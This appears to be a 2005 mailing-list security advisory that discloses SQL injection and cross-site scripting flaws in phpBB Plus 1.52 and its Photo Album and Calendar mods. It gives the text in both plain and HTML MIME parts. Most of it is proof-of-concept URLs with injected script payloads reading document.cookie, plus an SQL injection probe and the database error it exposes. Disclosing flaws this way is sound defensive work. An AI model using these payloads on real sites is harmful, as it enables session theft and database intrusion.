This is a multi-part message in MIME format. ------=_NextPart_000_0009_01C5406C.5DF1F1F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: Medium Title: Multiple Sql injection and XSS vulnerabilities in phpBB Plus = v.1.52 and below and some of its modules. Date: 13/04/2005 Vendor: PhpBB2 Plus and Smartor Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/ Summary: There are, multiple sql injection and xss vulnerabilities in = phpbb plus v.1.52 and below and some of its modules.. Proof of Concept Exploits:=20 PhpBB Plus v.1.52 and below http://localhost/groupcp.php?g=3D881&%3bsid=3D'%22%3E%3Cscript%3Ealert= (document.cookie)%3C/script%3E Pops cookie http://localhost/index.php?c=3D1&%3bsid=3D'%22%3E%3Cscript%3Ealert(doc= ument.cookie)%3C/script%3E Pops cookie http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%= 3C/script%3E&%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217 Pops cookie http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cooki= e)%3C/script%3E&%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217 Pops cookie http://localhost/portal.php?article=3D0&%3bsid=3D'%22%3E%3Cscript%3Eal= ert(document.cookie)%3C/script%3E Pops cookie http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(document.c= ookie)%3C/script%3E&%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59 Pops cookie http://localhost/viewforum.php?f=3D1&%3bsid=3D'%22%3E%3Cscript%3Ealert= (document.cookie)%3C/script%3E Pops cookie http://localhost/viewtopic.php?p=3D58834&%3bsid=3D'%22%3E%3Cscript%3Ea= lert(document.cookie)%3C/script%3E Pops cookie Photo Album v2.0.53 http://localhost/album_search.php?mode=3D'SQL_INJECTION&search=3Ddcrab SQL INJECTION DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax. Check the manual = that corresponds to your MySQL server version for the right syntax to = use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR = p.pic_c SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, = p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM = phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND = LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id = =3D 0 AND p.pic_approval =3D 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY = p.pic_time DESC Line : 105 File : album_search.php http://localhost/album_cat.php?cat_id=3D5&%3bsid=3D'%22%3E%3Cscript%3E= alert(document.cookie)%3C/script%3E Pops cookie http://localhost/album_comment.php?pic_id=3D224&%3bsid=3D'%22%3E%3Cscr= ipt%3Ealert(document.cookie)%3C/script%3E Pops cookie Calender MOD http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D&start=3D'"= >&%3bsid=3Dd32836b8178e5d62b2b1= 73ed177e4b0d Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. ------=_NextPart_000_0009_01C5406C.5DF1F1F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/=

Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at http://www.digitalpara= dox.org/services.ah

Severity: Medium
Title: Multiple Sql = injection=20 and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its=20 modules.
Date: 13/04/2005

Vendor: PhpBB2 Plus and = Smartor
Vendor Website:=20 http://www.phpbb2.de, http://smartor.is-root.com/
S= ummary:=20 There are, multiple sql injection and xss vulnerabilities in phpbb plus = v.1.52=20 and below and some of its modules..

Proof of Concept Exploits: =

PhpBB Plus v.1.52 and below
http://localhost/groupcp.php?= g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri= pt%3E
Pops=20 cookie

http://localhost/index.php?c=3D1&= amp;amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie

ht= tp://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C= /script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217
Pops=20 cookie

http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cook= ie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217
= Pops=20 cookie

http://localhost/portal.ph= p?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3= C/script%3E
Pops=20 cookie

http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(docum= ent.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59=
Pops=20 cookie

http://localhost/viewforum.ph= p?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri= pt%3E
Pops=20 cookie

http://localhost/viewtopi= c.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)= %3C/script%3E
Pops=20 cookie

Photo Album v2.0.53

http://localhost/album_search.php?mode=3D'SQL_INJECTION&se= arch=3Ddcrab
SQL=20 INJECTION

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the = manual=20 that corresponds to your MySQL server version for the right syntax to = use near=20 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_c

SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, = p.pic_username,=20 p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM = phpbb_album=20 AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND LIKE = '%\'SQL_INJECTION%'=20 AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =3D 0 AND p.pic_approval = =3D 1 AND LIKE=20 '%\'SQL_INJECTION%' ORDER BY p.pic_time DESC

Line : 105
File : album_search.php

http://localhost/album_c= at.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cooki= e)%3C/script%3E
Pops=20 cookie

http://localhost/a= lbum_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(do= cument.cookie)%3C/script%3E
Pops=20 cookie

Calender MOD
&amp%3bsi= d=3Dd32836b8178e5d62b2b173ed177e4b0d">http://localhost/calendar_scheduler= .php?d=3D1113174000&mode=3D&start=3D'"><script>alert(doc= ument.cookie)</script>&amp%3bsid=3Dd32836b8178e5d62b2b173ed177e= 4b0d
Pops=20 cookie

Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with = php.

------=_NextPart_000_0009_01C5406C.5DF1F1F0--